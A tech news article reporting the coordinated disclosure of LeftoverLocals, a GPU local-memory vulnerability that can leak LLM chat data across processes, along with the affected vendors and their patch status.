TNS
VOXPOP
Where are you using WebAssembly?
Wasm promises to let developers build once and run anywhere. Are you using it yet?
At work, for production apps
0%
At work, but not for production apps
0%
I don’t use WebAssembly but expect to when the technology matures
0%
I have no plans to use WebAssembly
0%
No plans and I get mad whenever I see the buzzword
0%
Large Language Models / Security

With LeftoverLocals, GPUs Can Leak LLM Prompt Data

A New York security firm found a vulnerability that compromises the security posture of many, though not all, GPUs.
Jan 17th, 2024 2:01pm by
Featued image for: With LeftoverLocals, GPUs Can Leak LLM Prompt Data

As more organizations start to incorporate Large Language Model-based AI into their services and products, they will have to keep an eye on new attack vectors these technologies surface.

On Tuesday, researchers from the New York security consultancy Trail of Bits discovered a way to surreptitiously read the memory values of a GPU from a fellow GPU hosted on the same server. It could be used, the researchers demonstrated, for eavesdropping — across container or process boundaries — on prompt-based chat sessions.

The vulnerability (CVE-2023-4969) works on GPUs from Apple, Qualcomm, AMD and Imagination (though it has not been demonstrated, as of yet, on those from either ARM or Nvidia, the current market leader for GPUs).

On an AMD Radeon RX 7900 XT, for instance, LeftoverLocals can leak about 5.5 MB for each GPU invocation.

For a 7 billion point model on llama.cpp, this would add up to about 181 MB for each LLM query — which is more than enough material to “reconstruct the LLM response with high precision,” wrote Trail of Bits’ researchers Heidy Khlaaf and Tyler Sorensen, who found the vuln in September.

How LeftoverLocals Works

A “co-resident exploit,” LeftoverLocals needs to be run on the same machine as the target, through another application or framework such as OpenCL, Vulkan, or Metal. Escalated privileges are not required.

The attack code would basically dump any local memory of the GPU that has not been initialized yet into global memory, allowing the attacker to read that data.

The code to execute this would not be difficult to write even for a dedicated amateur, the researchers note. They even provided a sample listening code for OpenCL:

In addition to the listener, the setup would also benefit from a writer script that writes a “canary value” into local memory, a way of checking if the GPU is vulnerable.

The blog post provides a lot more detail and context, so check it out. Interestingly enough, this exploit does not work for browser GPU frameworks, such as Google’s WebGPU, because they insert dynamic memory checks into GPU kernels.

How Vendors Responded to LeftoverLocals?

Upon identifying the vulnerability,  the research team launched a large coordinated disclosure effort, via the CERT Coordination Center, with all the major GPU vendors. As usual with hardware providers, some responded more promptly than others.

Apple did not acknowledge the vulnerability until this month, but Trail of Bits retesting found that some devices have been patched (3rd generation iPads with the A12 processor) while others remain vulnerable (Apple MacBook Air with the M2 processor).

AMD acknowledged the vulnerability and is looking into fixes. Qualcomm issued a patch for some, but not all of their GPUs. The company also praised the researchers’ coordinated disclosure process.

Imagination also released a patch, even though it was not Trail of Bits that found the vulnerability in Imagination’s silicon, but rather some researchers from Google, whose Android mobile software supports Imagination GPUs.

Trail of Bits also contacted Arm and NVidia, even though their GPUs thus far do not seem to be vulnerable.

What Is the Potential Impact of LeftoverLocals

While this security hole can still be present even on many popular consumer devices such as iPhone and Android phones, there has been no word, as of yet, of exploits. AMD itself evaluates the risk only as having a medium threat level.

Still, LeftoverLocals points to an emerging practice of securing LLMs and their supporting MLops.

As the researchers note: “The vulnerability highlights that many parts of the ML development stack have unknown security risks and have not been rigorously reviewed by security experts.”

Group Created with Sketch.
THE NEW STACK UPDATE A newsletter digest of the week’s most important stories & analyses.